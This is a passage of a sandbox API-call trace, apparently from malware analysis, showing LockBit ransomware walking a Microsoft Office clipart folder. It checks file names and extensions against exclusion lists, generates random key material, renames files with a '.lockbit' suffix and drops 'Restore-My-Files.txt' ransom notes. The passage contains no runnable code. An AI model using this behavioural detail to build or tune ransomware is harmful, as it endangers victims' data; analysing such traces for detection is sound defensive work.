lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107138.WMF") returned 1 [0139.404] lstrcmpiW (lpString1="ntldr", lpString2="J0107138.WMF") returned 1 [0139.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107138.WMF") returned 1 [0139.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107138.WMF") returned -1 [0139.404] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107138.WMF") returned -1 [0139.404] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107138.WMF") returned 1 [0139.404] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107138.WMF") returned -1 [0139.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned=".WMF" [0139.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.404] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.405] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.lockbit") returned 72 [0139.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.407] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.407] malloc (_Size=0x40068) returned 0x3df0008 [0139.407] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17200) returned 1 [0139.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.408] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.413] malloc (_Size=0xa6) returned 0x77d7a8 [0139.413] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.415] free (_Block=0x77d7a8) [0139.415] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.415] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.415] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107146.WMF", cAlternateFileName="")) returned 1 [0139.415] lstrcmpiW (lpString1=".", lpString2="J0107146.WMF") returned -1 [0139.415] lstrcmpiW (lpString1="..", lpString2="J0107146.WMF") returned -1 [0139.415] PathFindExtensionW (pszPath="J0107146.WMF") returned=".WMF" [0139.415] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.415] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.416] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.416] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107146.WMF") returned 1 [0139.417] lstrcmpiW (lpString1="ntldr", lpString2="J0107146.WMF") returned 1 [0139.417] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107146.WMF") returned 1 [0139.417] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107146.WMF") returned -1 [0139.417] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107146.WMF") returned -1 [0139.417] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107146.WMF") returned 1 [0139.417] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107146.WMF") returned -1 [0139.417] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.417] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF") returned=".WMF" [0139.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.417] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.417] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.418] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.418] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.lockbit") returned 72 [0139.418] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.419] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.419] malloc (_Size=0x40068) returned 0x3df0008 [0139.419] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14996) returned 1 [0139.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.421] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.426] malloc (_Size=0xa6) returned 0x77d7a8 [0139.426] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.427] free (_Block=0x77d7a8) [0139.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107146.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.427] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.427] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107148.WMF", cAlternateFileName="")) returned 1 [0139.427] lstrcmpiW (lpString1=".", lpString2="J0107148.WMF") returned -1 [0139.427] lstrcmpiW (lpString1="..", lpString2="J0107148.WMF") returned -1 [0139.427] PathFindExtensionW (pszPath="J0107148.WMF") returned=".WMF" [0139.427] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.427] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.428] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.429] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.429] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107148.WMF") returned 1 [0139.429] lstrcmpiW (lpString1="ntldr", lpString2="J0107148.WMF") returned 1 [0139.429] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107148.WMF") returned 1 [0139.429] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107148.WMF") returned -1 [0139.429] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107148.WMF") returned -1 [0139.429] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107148.WMF") returned 1 [0139.429] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107148.WMF") returned -1 [0139.429] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned=".WMF" [0139.430] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.430] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.430] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.431] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.431] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.431] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.431] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.lockbit") returned 72 [0139.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.432] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.432] malloc (_Size=0x40068) returned 0x3df0008 [0139.432] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20136) returned 1 [0139.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.433] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.437] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.437] malloc (_Size=0xa6) returned 0x77d7a8 [0139.438] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.440] free (_Block=0x77d7a8) [0139.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.440] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, 